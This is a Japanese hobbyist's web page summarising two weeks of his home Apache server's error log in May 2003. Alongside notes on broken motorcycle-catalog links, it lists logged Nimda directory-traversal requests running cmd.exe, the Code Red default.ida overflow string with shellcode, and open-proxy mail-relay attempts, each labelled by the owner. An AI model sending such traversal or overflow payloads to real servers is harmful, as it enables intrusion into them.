楽しみながら攻めつづける!
−HONDA '88NSR250R & '94NSR250R SE−

[検索方法]
 
山下の部屋 自宅サーバのログを見てみよう
お薦めコンテンツ 楽しみながら攻めつづける!
Apacheのログウォッチ 2003年5月1日〜2003年5月15日
 
 自宅Webサーバのログ集計です。相変わらず?WinサーバーのIISセキュリティを突いた不正アクセスが多いようです。robots.txtとfavicon.icoの2つのファイルはそれぞれファイル作成して自宅サーバに置いたことで解決したようです。
 
 ちなみにfavicon.icoは、IEでお気に入りに追加した際に登録されるアイコンだそうで・・・フリーのアイコン作成ソフトをダウンロードして簡単なアイコンを始めて作ってみました(トップページを試しにお気に入りに入れるとアイコンが表示されるので、気になる方は試して下さいね。)
 
 そうそう、今回は90NSRのカタログ画像へのリンク切れが数件出てました(汗)で、すぐにリンク切れを修正しました。う〜ん、意外とリンク切れって気が付かないものですね。
 
400:Bad Request
Method URL Query 回数 理由
GET /scripts/..%%35%63../winnt/system32/cmd.exe /c+dir 17 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%%35c./winnt/system32/cmd.exe /c+dir 17 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
 
404:Not Found
Method URL Query 回数 理由
GET /default.ida XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XX%u9090%u6
858%ucbd3%u
7801%u9090%
u6858%ucbd3
%u7801%u909
0%u6858%ucb
d3%u7801%u9
090%u990%u8
190%u00c3%u
0003%u8b00%
u531b%u53ff%
u0078%u0000
%u00=a		 280 「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/root.exe /c+dir 21 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /MSADC/root.exe /c+dir 21 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /c/winnt/system32/cmd.exe /c+dir 19 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 18 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 18 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /d/winnt/system32/cmd.exe /c+dir 18 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /c+dir 18 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 18 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c0%2f../winnt/system32/cmd.exe /c+dir 18 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 18 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 18 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 18 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%25%35%63../winnt/system32/cmd.exe /c+dir 17 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%252f../winnt/system32/cmd.exe /c+dir 17 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /nsr/90catalog/p06_right.jpg - 8 リンク切れ(汗)
GET /_vti_bin/owssvr.dll UL=1&ACT=4
&BUILD=2614
&STRMVER=4
&CAPREQ=0		 3 IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET /MSOffice/cltreq.asp UL=1&ACT=4
&BUILD=2614
&STRMVER=4
&CAPREQ=0		 3 IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET /nsr/90catalog/p03_left.jpg - 3 リンク切れ(汗)
GET /nsr/90catalog/p06_left.jpg - 3 リンク切れ(汗)
GET /nsr/90catalog/p05_right.jpg - 2 リンク切れ(汗)
GET /cgi-bin/class=\example\".class" - 1
GET /cgi-bin/class=\operator\".class" - 1
GET /cgi-bin/nsr/file/gt_moc.mid - 1
GET /nsr/90catalog/p03_right.jpg - 1 リンク切れ(汗)
GET /nsr/90catalog/p04_left.jpg - 1 リンク切れ(汗)
GET /nsr/90catalog/p05_left.jpg - 1 リンク切れ(汗)
 
405:Method Not Allowed
Method URL Query 回数 理由
CONNECT 207.46.181.13:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT 65.54.166.99:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT 61.135.132.100:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT mailin-02.mx.aol.com:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
 
501:Not Implemented
Method URL Query 回数 理由
\x04\x01   - 3 AN HTTPDのセキュリティホールをつく攻撃みたい
\x05\x01   - 3 AN HTTPDのセキュリティホールをつく攻撃みたい
SEARCH / - 2
 
 
BACK TOP PAGE